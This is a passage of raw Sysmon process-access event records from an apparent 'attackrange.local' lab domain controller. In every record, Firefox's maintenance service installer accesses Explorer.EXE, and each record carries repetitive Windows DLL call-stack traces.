Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 